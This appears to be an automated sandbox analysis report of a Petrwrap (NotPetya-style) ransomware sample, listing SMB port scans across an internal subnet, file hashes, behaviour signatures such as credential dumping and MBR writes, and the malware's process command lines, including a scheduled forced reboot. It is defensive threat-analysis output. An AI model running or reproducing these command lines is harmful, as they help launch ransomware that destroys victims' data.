N/A 10.127.1.103:139 tcp
N/A 10.127.1.104:445 tcp
N/A 10.127.1.104:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.1.105:445 tcp
N/A 10.127.1.105:139 tcp
N/A 10.127.1.106:445 tcp
N/A 10.127.1.106:139 tcp
N/A 10.127.1.107:445 tcp
N/A 10.127.1.107:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.1.108:445 tcp
N/A 10.127.1.108:139 tcp
N/A 10.127.1.109:445 tcp
N/A 10.127.1.109:139 tcp
N/A 10.127.1.110:445 tcp
N/A 10.127.1.110:139 tcp
N/A 10.127.1.111:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.1.111:139 tcp
N/A 10.127.1.112:445 tcp
N/A 10.127.1.112:139 tcp
N/A 10.127.1.113:445 tcp
N/A 10.127.1.113:139 tcp
N/A 10.127.1.114:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.1.114:139 tcp
N/A 10.127.1.115:445 tcp
N/A 10.127.1.115:139 tcp
N/A 10.127.1.116:445 tcp
N/A 10.127.1.116:139 tcp
N/A 10.127.1.117:445 tcp
N/A 10.127.1.117:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.1.118:445 tcp
N/A 10.127.1.118:139 tcp
N/A 10.127.1.119:445 tcp
N/A 10.127.1.119:139 tcp
N/A 10.127.1.120:445 tcp
N/A 10.127.1.120:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.1.121:445 tcp
N/A 10.127.1.121:139 tcp
N/A 10.127.1.122:445 tcp
N/A 10.127.1.122:139 tcp
N/A 10.127.1.123:445 tcp
N/A 10.127.1.123:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.1.124:445 tcp
N/A 10.127.1.124:139 tcp
N/A 10.127.1.125:445 tcp
N/A 10.127.1.125:139 tcp
N/A 10.127.1.126:445 tcp
N/A 10.127.1.126:139 tcp
N/A 10.127.1.127:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.1.127:139 tcp
N/A 10.127.1.128:445 tcp
N/A 10.127.1.128:139 tcp
N/A 10.127.1.129:445 tcp
N/A 10.127.1.129:139 tcp
N/A 10.127.1.130:445 tcp
N/A 10.127.1.130:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.1.131:445 tcp
N/A 10.127.1.131:139 tcp
N/A 10.127.1.132:445 tcp
N/A 10.127.1.132:139 tcp
N/A 10.127.1.133:445 tcp
N/A 10.127.1.133:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.1.134:445 tcp
N/A 10.127.1.134:139 tcp
N/A 10.127.1.135:445 tcp
N/A 10.127.1.135:139 tcp
N/A 10.127.1.136:445 tcp
N/A 10.127.1.136:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.1.137:445 tcp
N/A 10.127.1.137:139 tcp
N/A 10.127.1.138:445 tcp
N/A 10.127.1.138:139 tcp
N/A 10.127.1.139:445 tcp
N/A 10.127.1.139:139 tcp
N/A 10.127.1.140:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.1.140:139 tcp
N/A 10.127.1.141:445 tcp
N/A 10.127.1.141:139 tcp
N/A 10.127.1.142:445 tcp
N/A 10.127.1.142:139 tcp
N/A 10.127.1.143:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.1.143:139 tcp
N/A 10.127.1.144:445 tcp
N/A 10.127.1.144:139 tcp
N/A 10.127.1.145:445 tcp
N/A 10.127.1.145:139 tcp
N/A 10.127.1.146:445 tcp
N/A 10.127.1.146:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.1.147:445 tcp
N/A 10.127.1.147:139 tcp
N/A 10.127.1.148:445 tcp
N/A 10.127.1.148:139 tcp
N/A 10.127.1.149:445 tcp
N/A 10.127.1.149:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.1.150:445 tcp
N/A 10.127.1.150:139 tcp
N/A 10.127.1.151:445 tcp
N/A 10.127.1.151:139 tcp
N/A 10.127.1.152:445 tcp
N/A 10.127.1.152:139 tcp
N/A 10.127.1.153:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.1.153:139 tcp
N/A 10.127.1.154:445 tcp
N/A 10.127.1.154:139 tcp
N/A 10.127.1.155:445 tcp
N/A 10.127.1.155:139 tcp
N/A 10.127.1.156:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.1.156:139 tcp
N/A 10.127.1.157:445 tcp
N/A 10.127.1.157:139 tcp
N/A 10.127.1.158:445 tcp
N/A 10.127.1.158:139 tcp
N/A 10.127.1.159:445 tcp
N/A 10.127.1.159:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.1.160:445 tcp
N/A 10.127.1.160:139 tcp
N/A 10.127.1.161:445 tcp
N/A 10.127.1.161:139 tcp
N/A 10.127.1.162:445 tcp
N/A 10.127.1.162:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.1.163:445 tcp
N/A 10.127.1.163:139 tcp
N/A 10.127.1.164:445 tcp
N/A 10.127.1.164:139 tcp
N/A 10.127.1.165:445 tcp
N/A 10.127.1.165:139 tcp
N/A 10.127.1.166:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.1.166:139 tcp
N/A 10.127.1.167:445 tcp
N/A 10.127.1.167:139 tcp
N/A 10.127.1.168:445 tcp
N/A 10.127.1.168:139 tcp
N/A 10.127.1.169:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.1.169:139 tcp
N/A 10.127.1.170:445 tcp
N/A 10.127.1.170:139 tcp
N/A 10.127.1.171:445 tcp
N/A 10.127.1.171:139 tcp
N/A 10.127.1.172:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.1.172:139 tcp
N/A 10.127.1.173:445 tcp
N/A 10.127.1.173:139 tcp
N/A 10.127.1.174:445 tcp
N/A 10.127.1.174:139 tcp
N/A 10.127.1.175:445 tcp
N/A 10.127.1.175:139 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.1.176:445 tcp
N/A 10.127.1.176:139 tcp
N/A 10.127.1.177:445 tcp
N/A 10.127.1.177:139 tcp
N/A 10.127.1.178:445 tcp
N/A 10.127.1.178:139 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.1.179:445 tcp
N/A 10.127.1.179:139 tcp
N/A 10.127.1.180:445 tcp
N/A 10.127.1.180:139 tcp
N/A 10.127.1.181:445 tcp
N/A 10.127.1.181:139 tcp
N/A 10.127.1.182:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.1.182:139 tcp
N/A 10.127.1.183:445 tcp
N/A 10.127.1.183:139 tcp
N/A 10.127.1.184:445 tcp
N/A 10.127.1.184:139 tcp
N/A 10.127.1.185:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.1.185:139 tcp
N/A 10.127.1.186:445 tcp
N/A 10.127.1.186:139 tcp
N/A 10.127.1.187:445 tcp
N/A 10.127.1.187:139 tcp
N/A 10.127.1.188:445 tcp
N/A 10.127.1.188:139 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.1.189:445 tcp
N/A 10.127.1.189:139 tcp
N/A 10.127.1.190:445 tcp
N/A 10.127.1.190:139 tcp
N/A 10.127.1.191:445 tcp
N/A 10.127.1.191:139 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.1.192:445 tcp

Files

memory/1144-0-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/1144-8-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/1144-11-0x00000000001C0000-0x000000000021E000-memory.dmp

memory/1144-23-0x00000000001C0000-0x000000000021E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\202E.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/1144-9-0x00000000001C0000-0x000000000021E000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240508-en

Max time kernel

1800s

Max time network

1807s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

Signatures

Mimikatz

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\56AB.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\EditImport.vbs C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\ImportStart.docx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\InstallUnpublish.docx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\CompressImport.asp C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\javafx-src.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\NewAdd.vsdx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\SyncConnect.ppt C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed9 C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\56AB.tmp N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

C:\Users\Admin\AppData\Local\Temp\56AB.tmp

"C:\Users\Admin\AppData\Local\Temp\56AB.tmp" \\.\pipe\{BE829EEB-6C2A-49B3-89FF-523499492D5F}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
DE 136.243.69.123:445 tcp
SG 20.44.239.154:445 settings-win.data.microsoft.com tcp
N/A 10.127.0.1:445 tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
N/A 10.127.0.0:445 tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
SG 20.44.239.154:139 settings-win.data.microsoft.com tcp
N/A 10.127.0.1:139 tcp
DE 136.243.69.123:139 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
N/A 10.127.0.7:139 tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
N/A 10.127.0.8:445 tcp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
N/A 10.127.0.22:139 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.37:139 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.38:139 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.39:139 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.40:139 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.41:139 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.42:139 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.43:139 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.44:139 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.45:139 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.46:139 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.47:139 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.48:139 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.49:139 tcp
N/A 10.127.0.2:445 tcp
US 52.111.227.13:445 nexusrules.officeapps.live.com tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.2:139 tcp
US 52.111.227.13:139 nexusrules.officeapps.live.com tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.50:139 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.51:139 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.52:139 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.53:139 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.54:139 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.55:139 tcp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.56:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.57:139 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.58:139 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.59:139 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.60:139 tcp
N/A 10.127.0.61:445 tcp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
N/A 10.127.0.61:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.62:445 tcp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.62:139 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.63:139 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.64:139 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.65:139 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.66:139 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.67:139 tcp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.68:139 tcp
N/A 10.127.0.13:445 tcp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.69:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.70:139 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.71:139 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.72:139 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.73:139 tcp
N/A 10.127.0.74:445 tcp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
N/A 10.127.0.74:139 tcp
N/A 10.127.0.75:445 tcp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
N/A 10.127.0.17:445 tcp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
N/A 10.127.0.75:139 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.76:139 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.77:139 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.78:139 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.79:139 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.80:139 tcp
N/A 10.127.0.81:445 tcp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
N/A 10.127.0.81:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.82:445 tcp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
N/A 10.127.0.21:139 tcp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:139 tcp
